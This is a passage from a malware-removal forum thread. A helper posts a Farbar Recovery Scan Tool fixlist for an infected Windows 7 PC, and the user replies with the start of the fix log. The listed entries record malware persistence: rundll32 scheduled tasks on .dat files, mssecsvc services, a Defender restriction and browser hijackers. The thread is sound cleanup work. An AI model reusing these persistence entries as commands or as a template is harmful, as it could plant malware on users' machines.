Task: {8FB062A9-BD13-42B5-B65F-B285C09B088E} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe /doScheduledScan (No File)
Task: {9EC65580-F30B-49AD-B23D-E6619DA3685B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {A26E4F53-0C1D-47E6-93D4-2B1380751BD0} - \Mysa -> No File <==== ATTENTION
Task: {A4417F75-2B1A-43EF-B93B-A68027897A14} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe -SqlLiteRecoveryTask (No File)
Task: {A9206F35-0D9A-40E5-95E7-8C15E7CEC916} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe -PvrRecoveryTask (No File)
Task: {B4C24072-CB73-494D-A505-7A40E3341278} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-03-28] () [File not signed] <==== ATTENTION
Task: {BCB60D00-1E83-4159-A3BA-5432DB9EA769} - System32\Tasks\RunAsStdUser Task => C:\Users\Marilyn\AppData\Local\Temp\{86D4B82A-ABED-442A-BE86-96357B70F4FE}\RunIE.exe -secondattempt http://sp.ask.com/to...IE&success=1(NoFile) <==== ATTENTION
Task: {C7EE3052-AD50-4721-9A35-2ED1ADF2BEA4} - \Mysa3 -> No File <==== ATTENTION
Task: {C8A0777B-EC92-4B1A-A2B9-ABFBC4AD5908} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (No File)
Task: {C9E3D7FF-0540-40E1-BD19-0D3BE6985F4E} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{36888087-FCC5-4335-9E96-ACA2D2A95DAE}.exe --uninstall=1 (No File) <==== ATTENTION
Task: {CF9A5C01-BEE9-4B79-A201-E0D630BE6804} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {D0CA8ECB-D919-4545-AF78-12493EE2D0DB} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe /scheduledcheck (No File)
Task: {E374BBA4-EB46-4781-AF08-529748B61381} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe /StartRecording (No File)
Task: {E3E9FED2-6ED8-4C53-B7D7-8011E13B7949} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe RecoveryCDWin7 ShowMessageTask (No File)
Task: {EB21D51D-6372-4112-BA3A-8C465667B9D7} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (No File)
Task: {ED218DFE-D778-4991-AA1F-58CC4A678280} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (No File)
Task: {F197CC66-BBE6-48B8-A8FC-73595165CA95} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe /OCURActivate (No File)
Task: {F7430C5F-32A2-44D7-8618-ACC01D88C2F0} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe -crl -hms -pscn 15 (No File)
Task: {F8C2130E-A883-46E4-81C7-3F4E090DA514} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe $(Arg0) (No File)
Task: {FEEB404D-FF5E-4BA3-8E14-BFF9D5D072B1} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: C:\Windows\Tasks\MySearchDial.job => C:\Users\Marilyn\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{f40293b7-4e08-4a64-904a-4c25ff731d56} <==== ATTENTION (Restriction - IP)
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
CHR HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
S2 ehRecvr; %systemroot%\ehome\ehRecvr.exe [X]
S2 ehSched; %systemroot%\ehome\ehsched.exe [X]
S2 McAPExe; "C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe" [X]
S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\\McCSPServiceHost.exe" [X]
S3 mfefire; "C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe" [X]
S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]
S2 ModuleCoreService; "C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe" [X]
S2 MsF928BDEEApp; C:\Windows\System32\MsF928BDEEApp.dll [X]
S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
S2 PEFService; "C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe" [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 vzandnetdiag; system32\DRIVERS\lgvzandnetdiag64.sys [X]
S3 vzandnetdiag2; system32\DRIVERS\lgvzandnetdiag264.sys [X]
S3 vzandnetmodem; system32\DRIVERS\lgvzandnetmdm64.sys [X]
S3 vzandnetndis; system32\DRIVERS\lgvzandnetndis64.sys [X]
ContextMenuHandlers4: [MSSE] -> {0365FE2C-F183-4091-AC82-BFC39FB75C49} => -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {8a7d2060-824d-4b17-b00a-759b1b5f30d9} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=app_14_12_ie&cd=2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0SzztCtBtN1L2XzutBtFtCzztFyBtFtDtN1L1CzutCyEtDtAtDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StBtBzz0DyByDyBtDtG0AtC0BtBtG0C0FzzyDtGyC0ByB0DtGyE0CtByC0ByDtB0EtByByE0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCyB0AyCyE0BzyzytG0EyEtCyEtG0FyD0AyCtGtB0E0CtBtGyCtA0FtA0D0FyEyB0D0AyEzz2Q&cr=9292952&ir=
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKLM -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM-x32 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm011YYus&ptb=27ACC159-EE0E-4BC7-9AF7-0AD838A4715E&ind=2012012609&ptnrS=UXxdm011YYus&si=maps4pc&n=77ece041&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\.DEFAULT -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=82669&iwk=345&lng=en
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {cca2e567-1987-4100-a3c6-5b4267084510} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=YKman000&ptnrS=YKman000&ptb=7A5EC1B9-8047-4FF8-A1B9-C7D693FEB29C&psa=&ind=2012052710&st=sb&n=77ed7ce6&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {D9EDB55B-B082-4361-B3FE-E16541CB7E88} URL = hxxp://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: ShopAtHome.com Cash Back Helper -> {66516A07-F617-488A-90CF-4E690CFB3C5F} -> C:\Users\Marilyn\AppData\Roaming\ShopAtHome\ShopAtHomeToolbar\tbcore3U.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File
BHO-x32: GreatArcadeHits Add-on -> {D0C21091-FF8E-432C-9006-0540E81BA9D7} -> C:\Users\Marilyn\AppData\Local\GreatArcadeHits\GreatArcadeHitsIE.dll => No File
BHO-x32: mysearchdial Helper Object -> {EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD} -> C:\Program Files (x86)\Mysearchdial\1.8.29.0\bh\mysearchdial.dll => No File
Toolbar: HKLM-x32 - ShopAtHome.com Toolbar - {311B58DC-A4DC-4B04-B1B5-60299AD3D803} - C:\Users\Marilyn\AppData\Roaming\ShopAtHome\ShopAtHomeToolbar\tbcore3U.dll No File
Toolbar: HKLM-x32 - mysearchdial Toolbar - {3004627E-F8E9-4E8B-909D-316753CBA923} - C:\Program Files (x86)\Mysearchdial\1.8.29.0\mysearchdialTlbr.dll No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {A0154E07-2B48-475C-A82A-80EFD84EA33E} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {364EA597-E728-4CE4-BB4A-ED846EF47970} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} - No File
Hosts:
CMD: netsh int ip reset
CMD: ipconfig /flushDNS
EmptyTemp:
C:\Windows\Temp\*.*
End::

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Start FRST (FRST64) with Administrator privileges
Press the Fix button. FRST will process the lines copied above from the clipboard.
When finished, a log file (Fixlog.txt) will pop up and saved in the same location the tool was ran from.

Please copy and paste its contents in your next reply.


Sometimes the angels fly close enough to you that you can hear the flutter of their wings...


MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??

#10 Juliet

Juliet

    SuperHelper

  • Retired Classroom Teacher
  • 7,686 posts
  • Interests:Boo!....
  • MVP

Posted 28 March 2022 - 04:56 PM

BTW

This is a windows 7 computer,  microsoft is not releasing any security updates for outdated machines.


Sometimes the angels fly close enough to you that you can hear the flutter of their wings...


MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??

    Advertisements

Register to Remove


#11 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 07:49 PM

Yes, I let MBAM quarantine everything.

 

PCKeeper and Ask Toolbar Updater are gone.

 

Details of lsma22.exe  lsma22.JPG

 

Virus Total link: https://www.virustot...dec04?nocache=1

 

I'm running FRST fix now. Will update in a few minutes

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 28-03-2022
Ran by Marilyn (28-03-2022 21:48:17) Run:1
Running from C:\Users\Marilyn\Desktop
Loaded Profiles: Marilyn & Jay & Administrator & Guest
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
C:\Windows\Temp\conhoy.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [PCKeeperLive] => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun (No File)
C:\Program Files\Essentware\PCKeeper\PCKeeper.exe
C:\Program Files\Essentware\PCKeeper
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP Deskjet 3050A J611 series (NET)] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN18A481V305PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET)" -AutoStart 1 (No File)
